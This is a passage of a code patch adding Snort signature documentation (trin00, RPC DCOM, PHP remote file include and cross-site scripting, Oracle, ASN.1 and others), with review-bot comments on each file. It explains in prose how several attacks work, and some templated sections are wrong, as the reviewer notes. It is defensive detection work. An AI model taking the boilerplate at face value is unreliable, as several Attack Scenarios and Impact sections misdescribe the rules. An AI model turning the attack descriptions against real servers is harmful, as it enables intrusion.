+port 31335/udp with the text "PONG".
+
+Once a machine becomes part of a trin00 network, a Denial of Service (DoS) 
+is typically initiated against one (or more) victim machines.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of a large scale attack against a machine or a network, an
+attacker will compromise large numbers of machines which will form the
+army that the trin00 master daemon will command.  The master daemon
+typically instructs the clients to send mass-quantities of packets to
+a set of victim hosts.  If the traffic is sufficient, the victim
+machines will become resource deprived and thus endure a DoS condition.
+
+--
+Ease of Attack:
+Simple. Trinoo client and master programs are widely available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disconnect infected machine(s) from the network immediately.
+
+Use software to determine if a host has been compromised using a
+rootkit.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+SANS:
+http://www.sans.org/newlook/resources/IDFAQ/trinoo.htm
+
+--
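Review bot: Affected Systems is empty; it should at least say "Any host on which the trin00 daemon has been installed", or list the platforms the daemon is known to run on. The terminology also shifts between "client", "drone" and "daemon" for the same component; pick one and state the direction the rule watches, because "A functioning client will respond to port 31335/udp with the text "PONG"" means the alert fires on traffic from the compromised host to the master, which is the useful forensic fact (the destination address identifies the master). "DDos" in the Summary should be "DDoS". Under Corrective Action, "Use software to determine if a host has been compromised using a rootkit" is vague; say to look on the host for the trin00 daemon binary and for a process listening on the port the daemon uses for master commands, and to record the master's address from the PONG destination.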
--- /dev/null
+++ b/doc/signatures/1232.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1232
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
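Review bot: Nothing in this file says what the rule actually matches; Summary, Detailed Information and Attack Scenarios are generic web-server boilerplate ("Many known vulnerabilities exist for each implementation and the attack scenarios are legion"), so a reader cannot judge an alert or tune the rule. State the request pattern (URI, script name or parameter) the signature keys on and the product it was written for. "Ease of Attack: Simple. Exploits exist." and "False Positives: None known." both need that specificity to be checkable; a rule matching a common URI fragment will fire on legitimate traffic, and that belongs under False Positives.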
--- /dev/null
+++ b/doc/signatures/3366.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3366
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
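Review bot: This text duplicates the RPC DCOM description earlier in the patch word for word, including the mismatched Attack Scenarios ("An attacker may make a request for a file with an overly long filename via a network share", which is not an RPC DCOM attack) and the "Expoit code exists" typo. If 3366 detects a different request or a different DCOM interface from the earlier rule, Summary and Detailed Information should say which; if not, one of the two docs should point to the other rather than repeating it. Additional References is empty here too; add the vendor bulletin and CVE for the overflow.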
--- /dev/null
+++ b/doc/signatures/100000506.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000506
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Nucleus CMS" application running on a webserver. 
+Access to the file "api_metaweblog.inc.php" using a remote file being passed as 
+the "DIR_LIB" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DIR_LIB" parameter in the "api_metaweblog.inc.php" 
+script used by the "Nucleus CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Nucleus CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
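Review bot: Attack Scenarios does not describe a remote file include at all; "An attacker can access an authentication mechanism and supply his/her own credentials" is login-bypass boilerplate. For this rule the scenario is a single request to "api_metaweblog.inc.php" with "DIR_LIB" set to a URL on a host the attacker controls, so that the PHP script includes and runs the attacker's file; say that and drop the credential text. Related fixes: "may indicate that an exploitation attempt has been attempted" is redundant ("may indicate an exploitation attempt"); "running ona web server" is missing a space; Corrective Action should, besides patching, mention the PHP-side mitigation of not allowing includes from URLs. False Positives should say whether a legitimate request that passes an absolute URL in "DIR_LIB" would also match, since the Summary says the rule fires on a remote file reference in that parameter.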
--- /dev/null
+++ b/doc/signatures/100000451.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000451
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "KAPhotoservice" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "cat" parameter in the "album.asp" script used 
+by the "KAPhotoservice" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using KAPhotoservice
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
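Review bot: Impact and Detailed Information overstate a cross site scripting bug: "system integrity compromise", "unauthorized administrative access to the server" and "execute system binaries" describe server-side compromise, but the Attack Scenarios section correctly says the attack is a malicious link that steals information from the user who clicks it. The payload in the "cat" parameter of "album.asp" runs in the victim's browser in the context of the KAPhotoservice site, so the realistic impact is session or credential theft and actions performed as that user; rewrite Impact to say so and drop the server-compromise wording. Corrective Action should add that the application-side fix is to encode the "cat" value on output, not only to apply vendor patches, and "Exploits exist" under Ease of Attack should be replaced by the fact that a crafted URL is all that is needed.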
--- /dev/null
+++ b/doc/signatures/1737.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1737
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
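Review bot: The file never says which PHP application or script the rule matches; every section is generic ("All systems running PHP applications", "supplying input of their choosing to the underlying PHP script"), so an analyst seeing the alert cannot tell what was targeted or whether the host runs the affected product. Name the application, script and parameter the signature looks for, and scope Affected Systems to it. Also fix "running ona web server". The same generic text appears again for sid 1740 later in this patch; the two docs should differ in exactly these details.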
--- /dev/null
+++ b/doc/signatures/100000335.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000335
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "CaLogic Calendars" application running on a webserver. Access to the file "srxclr.php" using a remote file being passed as the "CLPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "CLPath" parameter in the "srxclr.php" script used by the "CaLogic Calendars" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using CaLogic Calendars
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
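Review bot: Attack Scenarios here is the credential-bypass boilerplate and does not describe the remote file include the Summary names; the scenario for this rule is one request to "srxclr.php" with "CLPath" pointing at an attacker-hosted file, which the script then includes and executes. Rewrite that section around the "CLPath" parameter and drop the "authentication mechanism" text. Minor: the file starts with two blank lines before "Rule:", unlike the other docs; "has been attempted" after "exploitation attempt" is redundant; "running ona web server" needs a space. Additional References is empty; cite the advisory for the CaLogic Calendars include bug so the fixed version can be checked.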
--- /dev/null
+++ b/doc/signatures/100000403.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000403
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "directory.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "directory.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
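Review bot: The same problems as the other remote-file-include docs in this patch apply to "directory.php"/"babInstallPath": Attack Scenarios talks about supplying credentials to an authentication mechanism instead of describing a request whose "babInstallPath" value is a URL to attacker-controlled PHP, the file opens with two blank lines, and "may indicate that an exploitation attempt has been attempted" and "running ona web server" need editing. Corrective Action should name the Ovidentia version that fixes the include, or Additional References should link the advisory, because "up to date version" gives the administrator nothing to check against.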
--- /dev/null
+++ b/doc/signatures/565.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+565
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+--
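Review bot: The Additional References entry, "OpenNap Specification / http://opennap.sourceforge.net/napster.txt", has nothing to do with a rule in attack-responses.rules and looks copied from a peer-to-peer rule doc; remove it or replace it with a reference relevant to the response this rule matches. The Summary, "a known response to a sucessful attack is detected", never says what the response is (which string, protocol or direction), so the analyst cannot confirm the hit; state the matched content and that it is seen in traffic leaving the server. "sucessful" appears twice and should be "successful". Under Corrective Action, "Check for listening services on high ports" is good advice for a bind shell but should be tied to the specific response this rule sees.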
--- /dev/null
+++ b/doc/signatures/2042.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+2042
+
+--
+Summary:
+This event is generated when a successful attempt has been made to login
+using XTACACS from a machine outside the local area network.
+
+--
+Impact:
+This may be an attempt to access resources controlled by the XTACACS 
+server. Data compromize may occur.
+
+--
+Detailed Information:
+The Extended Terminal Access Controller Access Control System (XTACACS) 
+is an authentication and authorization protocol derived from  CISCO 
+TACACS. It is used in tcp/ip networks where network servers authenticate
+clients from a master server.
+
+When a user logs in to a server that uses XTACACS the server then makes 
+a request to a master server to detrmine the validity of the request. 
+The master server then verifies the login attempt and returns data 
+concerning that user which may include information regarding resources 
+the user is allowed access to in the form of an access list.
+
+--
+Affected Systems:
+All servers using XTACACS for authentication control.
+
+--
+Attack Scenarios:
+Regular user login method.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+XTACACS servers should only authenticate to known hosts and firewall 
+rules should prevent access to XTACACS enabled servers from outside the 
+local area network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Network Information Library - Intel:
+http://www.intel.com/support/si/library/bi0414.htm
+
+The Internet Next Generation Project:
+http://ing.ctit.utwente.nl/WU5/D5.1/Technology/xtacacs/
+
+--
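Review bot: False Positives is empty, yet Attack Scenarios says "Regular user login method", which means every legitimate XTACACS login whose source falls outside the configured home network will raise this event; document that, and say the rule is only meaningful when the network variables are set so that the XTACACS server's legitimate clients are internal. The Summary should name the transport and port XTACACS uses so the reader can verify what the rule inspects. Typos: "compromize" should be "compromise", "detrmine" should be "determine", "CISCO" should be "Cisco" and "tcp/ip" should be "TCP/IP".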
--- /dev/null
+++ b/doc/signatures/2682.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2682
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure validate_geom
+. This procedure is included in
+mdsys.md2.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
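Review bot: As with the other Oracle procedure docs in this patch, the procedure name is broken across lines ("validate_geom / . This procedure is included in / mdsys.md2."); write it as mdsys.md2.validate_geom in one sentence. Affected Systems has the doubled "Oracle Oracle9i" and no release, and Additional References is empty, so the reader cannot map "Apply the appropriate vendor supplied patch" to an actual patch set; add the Oracle alert or CVE. Detailed Information and Attack Scenarios are shared boilerplate; the one rule-specific fact (which argument of validate_geom overflows, or at least that an oversized argument to this procedure is what the rule matches) should be stated so the alert can be verified against the captured SQL.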
--- /dev/null
+++ b/doc/signatures/100000350.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000350
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "UBBThreads" application running on a webserver. Access to the file "ubbt.inc.php" using a remote file being passed as the "GLOBALS[thispath]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "GLOBALS[thispath]" parameter in the "ubbt.inc.php" script used by the "UBBThreads" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using UBBThreads
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
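Review bot: The parameter this rule keys on is "GLOBALS[thispath]", which is an attempt to overwrite a global variable through request input rather than an ordinary script parameter; Detailed Information should say so, and Corrective Action should state whether the include in "ubbt.inc.php" is only reachable when PHP is configured to register request variables as globals, since turning that off would be the immediate mitigation. The Attack Scenarios credential text does not describe a remote file include and should be replaced with the request-carrying-a-URL scenario. Minor: two blank lines open the file, "has been attempted" is redundant after "exploitation attempt", and "running ona web server" needs a space.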
--- /dev/null
+++ b/doc/signatures/100000461.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000461
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Open WebMail" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "To" parameter in the "openwebmail-read.pl" 
+script used by the "Open WebMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Open WebMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
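Review bot: Impact repeats the server-compromise wording ("system integrity compromise", "administrative access to the server", "execute system binaries") that does not fit a cross site scripting bug in the "To" parameter of "openwebmail-read.pl"; the injected script runs in the mail user's browser, so the realistic impact is theft of the webmail session and reading or sending mail as that user, which matters here because the victim is already authenticated to a mail application. Rewrite Impact and the second Detailed Information paragraph around that, and under Corrective Action add output encoding of the "To" value as the application-side fix alongside patching.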
--- /dev/null
+++ b/doc/signatures/1740.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1740
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
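Review bot: This file is identical to 1737.txt earlier in the patch apart from the Sid; two rules with different match criteria should not share a doc that names no application, script or parameter. Add the rule-specific target for 1740 so the two can be told apart, scope Affected Systems accordingly, and fix "running ona web server".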
--- /dev/null
+++ b/doc/signatures/370.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+370
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a host running BeOS4.x.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a host running BeOS4.x contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS151
+
+--
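Review bot: "Block inbound ICMP echo requests" under Corrective Action is broader than the finding warrants; the event fingerprints a ping from a BeOS host, so the proportionate advice is to restrict or rate-limit echo requests at the perimeter and treat the alert as reconnaissance to correlate with later scans, not to drop all pings and lose a diagnostic tool (the False Positives section itself says ping is used legitimately). Detailed Information should show the distinguishing payload bytes the rule matches, since "contains a unique payload" is the whole basis of the signature and the reader has nothing to compare against. Typos: "legimately" should be "legitimately"; "BeOS4.x" should be "BeOS 4.x". The contributor address uses whitehats.org while the reference uses whitehats.com; check which is right.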
--- /dev/null
+++ b/doc/signatures/2382.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+2382
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
